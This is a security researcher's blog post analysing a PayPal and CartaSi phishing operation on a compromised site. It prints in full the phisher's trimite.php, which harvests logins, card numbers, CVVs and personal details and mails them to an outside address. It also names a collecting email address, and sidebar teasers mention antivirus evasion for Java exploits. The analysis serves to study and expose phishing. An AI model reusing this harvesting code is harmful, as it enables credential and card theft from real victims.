CartaSi phishing email part 2/2

Behind this phishing emails there are several people or just one guy ?

What i think is that there is only one guy because if you check the title of this script you see the write assembled by ME, if it was a team should be written Assembled by XYZ team.


Where is he from ?

His mother language is romanian and i think he lives in Italy. As you can see below there are several files written in romanian and the stolen information are sent to a fastweb email that you cannot made if you don't leave in Italy.

I was wrong in the previous article saying that the pisher hacked the webstie because was defaced by FERID23 from anti-armenia.org. I suppose that at the end of September 2011 this phisher found it, uploaded a shell and created several folders in this order:
  1. d3b (postepay information stealer)
  2. stf   (cartasi, uk paypal, banca intesa, it paypal, postepay, VISA)
  3. pastote (cartasi, paypal, VISA, bancopostaclick)

Taking a look to pastote folder we see that he uses a mass mailer script to send phishing emails.


The emails address are stored in 30 rar files named pastoteXX.


From 2/3/2012 he started targetting paypal user but using a different method. I don't have any email of paypal phising but for what there is on this site i can guess that he sends an email saying you have received a bonus of 100 euro, in order to proceed login to your paypal (fake link provided) account and fill the form.

When a victim click on the link will be redirected to this fake page on this site.


Once logged in



Once filled the form and clicked send the data are redirected to a script called trimite.php which translated from romanian means send/forward. This time the data aren't stored in a txt file like previous but directly sent to a fastweb email and in the end redirect the victim to the original site.

$username = $_POST['username'];
$password = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$data = date("l, F d, Y h:i" ,time());
$agent = $_SERVER['HTTP_USER_AGENT'];
$nome = $_POST['nome'];
$cognome = $_POST['cognome'];
$c_tip = $_POST['credit_card_type'];
$cn = $_POST['cc_number'];
$an = $_POST['expdate_year'];
$luna = $_POST['expdate_month'];
$cvv = $_POST['cvv'];
$dob_ziua = $_POST['dob_ziua'];
$dob_luna = $_POST['dob_luna'];
$dob_an = $_POST['dob_an'];

$address1 = $_POST['adresa'];
$zip = $_POST['cod_postal'];
$city = $_POST['oras'];
$state = $_POST['provincie'];

//---Email---//
$email = "--snip--@fastwebmail.it";
$subiect = "$ip:$username:$password";
$headers  = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";

$mesaj_html ="











Indirizzo email
$username




Password PayPal
$password
















Nome
$nome




Gnome
$cognome




Data di nascita:
$dob_ziua:$dob_luna:$dob_an(ziua:luna:an)
















Indirizzo
$address1




CAP
$zip




Città
$city




Provincia
$state
















Tipo di carta di credito
$c_tip




Numero della carta di credito
$cn




Data di scadenza
$luna/$an




Codice di sicurezza della carta
$cvv
















IP
$ip




Data
$data




Browser
$agent




";

mail($email, $subiect, $mesaj_html, $headers);
header("Location: http://www.paypal.it");

He did a good job to replicate paypal login process.

In the stf folder all stolen data are sent to fanemacaz@gmail.com and the techniques used to trick users are the same explained previously.

Folder index file.


Folder content.


That's all for now.

Comments

  1. AnonymousMay 15, 2012 at 3:11 PM

    these guys have been arrested in romania

    ReplyDelete
    Replies
    1. Security ObscurityMay 16, 2012 at 2:26 PM

      Good news. There is any site that report this news ?

      Delete
    2. AnonymousMay 17, 2012 at 9:23 AM

      http://www.opinii.biz/2012/04/george-ariel-boltocgavril-tiberiu.html
      http://www.ziaruldepascani.ro/index.php?option=com_content&view=article&id=2924:romario-mistocar-si-fratii-paiu-arestati-pentru-clonare-de-cardurivideo&catid=17:slider
      http://www.adevarul.ro/locale/iasi/Tinerii_care_furau_bani_de_pe_carduri_si_ii_jucau_la_pariuri_stau_29_de_zile_dupa_gratii_0_691731080.html

      Can you give me an email adress to talk to you in private please?
      Thanks

      Delete
    3. Security ObscurityMay 17, 2012 at 3:43 PM

      Thank you for the links. I added a box with my email address in the right column of the blog.

      Delete

Post a Comment

Popular posts from this blog

Java Exploit Code Obfuscation and Antivirus Bypass/Evasion (CVE-2012-4681)

Image
Why not play a game where we try to make the latest (at time of writing) public java exploit ( CVE-2012-4681 ) undetected by all antivirus and see who will be the last to detect it ?. I think it will be a funny "challenge" because evading antivirus has always his charm. I will not use software obfuscators like proGuard, Allatori, Zelix KlassMaster etc... This because will not be funny. This is not intended to be an analysis or explanation because there are already great post here: http://immunityproducts.blogspot.com.ar/2012/08/java-0day-analysis-cve-2012-4681.html http://www.deependresearch.org/2012/08/java-7-vulnerability-analysis.html http://www.h-online.com/security/features/The-new-Java-0day-examined-1677789.html Before we start we need to make two considerations: From The Current Web-Delivered Java 0Day :  So while you may see a few links to Virustotal with the inevitable complaining that a scanner is missing a specific chunk of altered code along with innacc
Read more

The Latest Java Exploit with Security Prompt/Warning Bypass (CVE-2013-2423)

Image
From Java SE 7 update 11 oracle has introduced a new security features called  security warning that prompts a window every time an applet request for execution. For example, if we want to execute latest Java SE 7 update 17 exploit we get this warning. Yesterday Immunity has published a blog post explaining a new vulnerability they have found into the java validating mechanism which allow to execute an untrusted applet without showing the warning. For in-dept details read their blog post here . Briefly, to bypass the above prompt you must call the applet with the parameter __applet_ssv_validated set to true. The only way to manipulate this parameter is to use a java Network Launch Protocol file. Regarding to oracle there are two ways to use JNLP in a page: With the applet tag  With javascript only Let's try first the example with the tag applet. The code we're going to run is the latest publicly available java exploit CVE-2013-2423 .  import java.applet.
Read more

Deobfuscating Java 7u11 Exploit from Cool Exploit Kit (CVE-2013-0431)

Image
At the beginning of the past week @EKWatcher  has spotted Cool Exploit Kit using Java 7 update 11 vulnerability (CVE-2013-0431). This vulnerability was already reported by Security Explorations on seclist few days after Oracle issued update 11. I decided take a look at it. I found a website infected by Cool EK that after a successfull exploitation dropped Reveton into " C:\Documents and Settings\<usarname>\Application Data " folder on Windows XP. The applet used by Cool EK was named would-blood.jar and once opened with JD-GUI the result was this. As you can see it's obfuscated, not heavily but obfuscated. The first thing to do when you want to start deobfuscating an applet is to find the init() function which is the "starting point" and cannot be changed. Remember that for serialized applets the starting point is a function called start() instead of init(). The init function is inside  hw class. It's immediately evident that al
Read more